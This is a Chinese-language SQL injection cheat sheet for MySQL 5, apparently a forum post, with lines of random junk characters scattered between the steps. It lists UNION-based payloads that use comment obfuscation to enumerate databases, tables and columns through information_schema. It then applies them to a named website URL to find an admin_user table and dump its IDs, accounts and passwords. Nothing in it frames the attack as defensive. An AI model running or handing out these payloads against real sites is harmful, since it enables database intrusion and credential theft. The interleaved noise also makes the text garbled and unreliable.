查库4 D: v" c8 E, A4 N4 U8 n' ^" K( M+ A
' @0 [1 @8 \) Y- i' S
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*" F9 x" K2 E9 ? Z! b
( W2 b0 y% V; w3 x& s9 u查表
7 A" S) n9 [6 ?4 ]$ L) K0 j% I6 M1 Y1 o2 p
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1
# R" x! W6 E( T- u
, c2 I) l! p4 R& T. M查段1 g3 X& k% @0 F. Y% t0 Y. N
% L1 s4 q# c) P% K4 x i+ X( b) J
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
4 G# [( W% `8 V9 Z$ l8 ]
5 Z9 e5 c. S: W4 J- x
* `9 q+ D* N) O' G# Wmysql5高级注入方法暴表
x* A; y) ^1 p8 _/ C; E/ ^6 a; ]8 G
" G* n1 Q3 L6 b& g/ B% l2 S# P例子如下:
6 E- }4 c5 d) S! {+ f, j5 W0 K5 }- e% R3 F+ M7 l
1.爆表7 `" U M* u+ F( e: O& b) [
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
4 s- Q! s% G% b6 z( u2 j3 r这样爆到第4个时出现了admin_user表。" T( V/ c; K# U5 P2 d
& ~5 \& n" Z4 A2.暴字段2 \" H! J. q* @+ C# ]
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*7 y3 Q; X& s; q0 x, ^9 ?0 l5 F
* z+ k/ ?; H2 X, K" J; K% l) u- ~
: e) d: D+ n: J9 a1 L+ }3.爆密码, z' v" K; H- y i
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/* + |, Z+ S2 l' R R) E/ d4 V
: Y+ O' D7 S' u! f z1 j3 p& [! C( J6 C r
|